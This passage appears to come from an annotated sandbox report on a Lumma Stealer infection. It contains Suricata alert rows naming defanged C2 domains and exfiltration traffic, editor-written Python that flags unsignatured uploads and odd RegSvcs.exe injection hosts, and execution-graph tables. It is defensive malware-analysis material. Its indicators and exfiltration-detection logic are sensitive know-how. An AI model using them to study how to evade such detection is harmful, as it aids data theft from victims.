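2025-01-14T08:27:11.905812+0100 | 2059209 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) | 1 | 192.168.2.4 | 54093 | 1.1.1.1 | 53 | UDP
2025-01-14T08:27:11.927906+0100 | 2059191 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) | 1 | 192.168.2.4 | 53855 | 1.1.1.1 | 53 | UDP
2025-01-14T08:27:12.602411+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP
2025-01-14T08:27:13.109424+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP
2025-01-14T08:27:13.819855+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:14.261530+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:14.261530+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:14.743708+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:15.093246+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:15.093246+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:15.727636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:17.659036+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:18.480783+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:19.021812+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:20.289084+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:22.160237+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:24.845892+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
2025-01-14T08:27:25.345878+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
"""

# The nine HTTPS session tables, condensed to (client port, server, OUT sizes, IN sizes).
SESSIONS = {
    0: (49730, "104.102.49.254", [219], [1905, 14479, 16384, 3768, 510]),
    1: (49732, "188.114.96.3", [266, 8], [1127, 7, 5]),
    2: (49736, "188.114.96.3", [267, 49], [1131, 238] + [1369] * 8),
    3: (49738, "188.114.96.3", [275, 15331, 2774], [1130, 20, 5]),
    4: (49740, "188.114.96.3", [277, 8744], [1123, 20, 5]),
    5: (49741, "188.114.96.3", [278, 15331, 5066], [1139, 20, 5]),
    6: (49743, "188.114.96.3", [282, 1387], [1131, 20, 5]),
    7: (49745, "188.114.96.3", [279] + [15331] * 10, [1138]),
    8: (49748, "188.114.96.3", [267, 84], [1129, 54, 5]),
}

JA3_SID = 2028371  # severity-3 JA3 rule that fires on every TLS session in this capture
DOMAIN_RE = re.compile(r"\(([a-z0-9-]+) \.([a-z]+)\)")  # defanged "name .tld" inside rule names


def parse_alerts(text: str) -> list:
    """Split the pipe-separated Suricata rows into dicts with typed ports and SIDs."""
    rows = []
    for line in text.strip().splitlines():
        ts, sid, sig, sev, src, sport, dst, dport, proto = [c.strip() for c in line.split("|")]
        rows.append({"ts": ts, "sid": int(sid), "sig": sig, "sev": int(sev), "src": src,
                     "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto})
    return rows


def c2_domains(alerts: list) -> list:
    """Refang the domains named by the DNS-lookup rules, in first-seen order, deduplicated."""
    seen = {}
    for a in alerts:
        m = DOMAIN_RE.search(a["sig"])
        if m and a["dport"] == 53:
            seen[f"{m.group(1)}.{m.group(2)}"] = None
    return list(seen)


def sids_by_host(alerts: list) -> dict:
    """Which rules fired against each TLS server."""
    by = defaultdict(set)
    for a in alerts:
        if a["proto"] == "TCP":
            by[a["dst"]].add(a["sid"])
    return dict(by)


def session_summary(alerts: list, sessions: dict) -> dict:
    """Join every HTTPS session to the alerts raised on its client port; total bytes each way."""
    summary = {}
    for sess_id, (sport, dst, tx, rx) in sessions.items():
        sids = {a["sid"] for a in alerts if a["proto"] == "TCP" and a["sport"] == sport}
        summary[sess_id] = {"dst": dst, "out": sum(tx), "in": sum(rx), "sids": sids}
    return summary


def unsignatured_uploads(summary: dict, min_out: int = 10_000) -> list:
    """Sessions that sent at least min_out bytes but tripped nothing beyond the JA3 rule."""
    return sorted(s for s, v in summary.items()
                  if v["out"] >= min_out and not (v["sids"] - {JA3_SID}))


if __name__ == "__main__":
    alerts = parse_alerts(ALERTS)
    print("dead C2 domains:", ", ".join(c2_domains(alerts)))
    summary = session_summary(alerts, SESSIONS)
    for sess_id, v in summary.items():
        print(f"session {sess_id} -> {v['dst']}: out={v['out']:>7} in={v['in']:>6} sids={sorted(v['sids'])}")
    print("uploads with only the JA3 hit:", unsignatured_uploads(summary))
```

The last line of output is the practical point: three of the four large uploads would be invisible to a console that filters on severity-1 Lumma rules, but a per-session out/in ratio over the same tables flags all of them.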
Target ID | 0 | 1 | 2 | 3 | 4 | 5 |
---|---|---|---|---|---|---|
Start time | 02:27:08 | 02:27:08 | 02:27:11 | 02:27:11 | 02:27:11 | 02:27:11 |
Start date | 14/01/2025 | 14/01/2025 | 14/01/2025 | 14/01/2025 | 14/01/2025 | 14/01/2025 |
Path | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\conhost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit) | false | false | false | false | true | false |
Commandline | | | | | | |
Imagebase | 0x7ff788560000 | 0x7ff7699e0000 | 0x250000 | 0x40000 | 0xbe0000 | 0x7ff783f90000 |
File size | 452'608 bytes | 862'208 bytes | 45'984 bytes | 45'984 bytes | 45'984 bytes | 229'728 bytes |
MD5 hash | 04029E121A0CFA5991749937DD22A1D9 | 0D698AF330FD17BEE3BF90011D49251D | 9D352BC46709F0CB5EC974633A0C3C94 | 9D352BC46709F0CB5EC974633A0C3C94 | 9D352BC46709F0CB5EC974633A0C3C94 | 74A0194782E039ACE1F7349544DC1CF4 |
Has elevated privileges | true | true | true | true | true | true |
Has administrator privileges | true | true | true | true | true | true |
Programmed in | C, C++ or other language | C, C++ or other language | C, C++ or other language | C, C++ or other language | C, C++ or other language | C, C++ or other language |
Reputation | high | high | high | high | high | moderate |
Has exited | true | true | true | true | true | true |
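Two of the three RegSvcs.exe entries (Target IDs 2 and 3) report Wow64 false even though C:\Windows\Microsoft.NET\Framework\ holds the 32-bit Framework binaries on x64 Windows (the 64-bit builds live under Framework64); only Target ID 4, the instance that carried the network sessions above, is reported as a WOW64 process. Reading a process table like this one, a practitioner checks that kind of consistency mechanically rather than by eye. The script below is an added example by the editor, not Joe Sandbox code; the six records are constructed from the entries above, and the list of .NET utilities treated as injection hosts is an assumption.

```python
"""Consistency checks over per-process records from a sandbox report.

Added editorial example, not Joe Sandbox code.  PROCS is constructed from
the Target ID 0-5 entries above (path, Wow64 flag, image base).
"""
from dataclasses import dataclass

# .NET Framework utilities routinely used as hollowing/injection hosts.
# Assumed list (editor's choice), not something the report states.
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


@dataclass(frozen=True)
class Proc:
    target: int
    path: str
    wow64: bool
    imagebase: int


def expected_wow64(path: str):
    """On x64 Windows the 32-bit system binaries live under SysWOW64 and
    Microsoft.NET\\Framework; the 64-bit builds are under System32 and
    Microsoft.NET\\Framework64.  Returns None when the path is not decisive."""
    p = path.lower().replace("/", "\\")
    if "\\syswow64\\" in p or "\\microsoft.net\\framework\\" in p:
        return True
    if "\\system32\\" in p or "\\microsoft.net\\framework64\\" in p:
        return False
    return None


def check_process(proc: Proc) -> list:
    """Return findings for one record; an empty list means nothing odd."""
    findings = []
    name = proc.path.rsplit("\\", 1)[-1].lower()
    if name in INJECTION_HOSTS:
        findings.append(f"{name} is a .NET utility commonly used as an injection host")
    exp = expected_wow64(proc.path)
    if exp is not None and exp != proc.wow64:
        findings.append(f"Wow64={proc.wow64} disagrees with the image path (expected {exp})")
    # A WOW64 process has at most a 4 GiB address space, so an image base at
    # or above 2**32 cannot belong to one.
    if proc.wow64 and proc.imagebase >= 1 << 32:
        findings.append(f"Wow64=True but image base {proc.imagebase:#x} is above 4 GiB")
    return findings


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
# Constructed from the process table above.
PROCS = [
    Proc(0, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", False, 0x7FF788560000),
    Proc(1, r"C:\Windows\System32\conhost.exe", False, 0x7FF7699E0000),
    Proc(2, REGSVCS, False, 0x250000),
    Proc(3, REGSVCS, False, 0x40000),
    Proc(4, REGSVCS, True, 0xBE0000),
    Proc(5, r"C:\Windows\System32\wermgr.exe", False, 0x7FF783F90000),
]


def report(procs=PROCS) -> dict:
    """Map target id -> findings, for the records that have any."""
    return {p.target: f for p in procs if (f := check_process(p))}


if __name__ == "__main__":
    for tid, findings in report().items():
        print(f"Target {tid}:")
        for f in findings:
            print("  -", f)
```

Only Targets 2, 3 and 4 come back with findings: all three because RegSvcs.exe is an injection host, and 2 and 3 additionally for the Wow64 flag that contradicts their path. Whether that contradiction is a sandbox instrumentation artifact or a sign those two instances died before they were fully mapped is not something the report settles; the check is there to make the reader ask.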
Execution Graph
Execution Coverage: | 1.9% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 7 |
Total number of Limit Nodes: | 0 |
Graph: the per-function control-flow graphs, API lists and string lists are not reproduced; only each function's summary line survives.

Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
00007FFD9B970FA4 | 2.0 | | | 2009 | COMMON |
00007FFD9B971390 | .2 | | | 174 | COMMON |
00007FFD9B8AA769 | .1 | | | 140 | COMMON |
00007FFD9B8AA7A0 | .1 | | | 103 | COMMON |
Execution Graph
Execution Coverage: | 8.9% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 47.7% |
Total number of Nodes: | 327 |
Total number of Limit Nodes: | 19 |
Graph: the per-function control-flow graphs, API lists and string lists are not reproduced; only each function's summary line survives.

Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
0043B7B0 | 23.6 | 11 | 2 | 851 | memory, com, COMMON |
00408740 | 10.7 | 5 | 1 | 228 | thread, COMMON |
0040CB44 | 3.0 | 2 | | 30 | COMMON |
00410446 | 2.4 | 1 | | 941 | COMMON |
00427A50 | 1.7 | | 1 | 403 | COMMON |
004402D0 | 1.5 | 1 | | 14 | library, COMMON |
0040BA29 | 1.3 | | 1 | 84 | COMMON |
0042D420 | .1 | | | 122 | COMMON |
004406A2 | 3.0 | 2 | | 14 | COMMON |
00432D44 | 1.6 | 1 | | 94 | COMMON |
0042F596 | 1.6 | 1 | | 75 | COMMON |
0042F586 | 1.6 | 1 | | 61 | COMMON |
0043AA74 | 1.6 | 1 | | 55 | COMMON |
00440260 | 1.5 | 1 | | 45 | memory, COMMON |
004358EF | 1.5 | 1 | | 26 | COMMON |
00432648 | 1.5 | 1 | | 24 | COMMON |
0043E860 | 1.5 | 1 | | 22 | memory, COMMON |
0043E840 | 1.5 | 1 | | 9 | memory, COMMON |
00425E00 | 34.2 | | 27 | 430 | COMMON |
004251E8 | 34.2 | | 27 | 426 | COMMON |
00417451 | 6.7 | | 5 | 462 | COMMON |
0040A910 | 6.7 | | 5 | 422 | COMMON |
00420B10 | 5.5 | | 4 | 470 | COMMON |
0042F799 | 5.4 | | 4 | 395 | COMMON |
00408EB0 | 5.3 | | 4 | 299 | COMMON |
0041AA90 | 4.4 | | 3 | 606 | COMMON |
004095A0 | 4.1 | | 3 | 375 | COMMON |
0042E5C2 | 3.9 | | 3 | 189 | COMMON |
00413E50 | 3.4 | | 2 | 884 | COMMON |
0041F710 | 3.0 | | 2 | 527 | COMMON |
0043C410 | 2.8 | | 2 | 349 | COMMON |
0042DFAF | 2.6 | | 2 | 124 | COMMON |
0042E7EB | 2.6 | | 2 | 108 | COMMON |
004273A0 | 1.6 | | 1 | 311 | COMMON |
004082A0 | 1.5 | | 1 | 288 | COMMON |
0042E002 | 1.4 | | 1 | 152 | COMMON |
00426A00 | 1.3 | | 1 | 11 | COMMON |
00407400 | .6 | | | 625 | COMMON |
004288BA | .4 | | | 371 | COMMON |
00415590 | .3 | | | 326 | COMMON |
00426D70 | .3 | | | 280 | COMMON |
004427E0 | .2 | | | 242 | COMMON |
0041DC40 | .2 | | | 204 | COMMON |
00402940 | .2 | | | 164 | COMMON |
00429871 | .1 | | | 136 | COMMON |
00408CD0 | .1 | | | 126 | COMMON |
0040DFEA | .1 | | | 126 | COMMON |
0040DE72 | .1 | | | 120 | COMMON |
0043EB00 | .1 | | | 86 | COMMON |
00415C25 | .1 | | | 80 | COMMON |
00438AF0 | .1 | | | 64 | COMMON |
0042B430 | .1 | | | 63 | COMMON |
0043EE10 | .0 | | | 46 | COMMON |
0041DEB0 | .0 | | | 21 | COMMON |
00440310 | .0 | | | 20 | COMMON |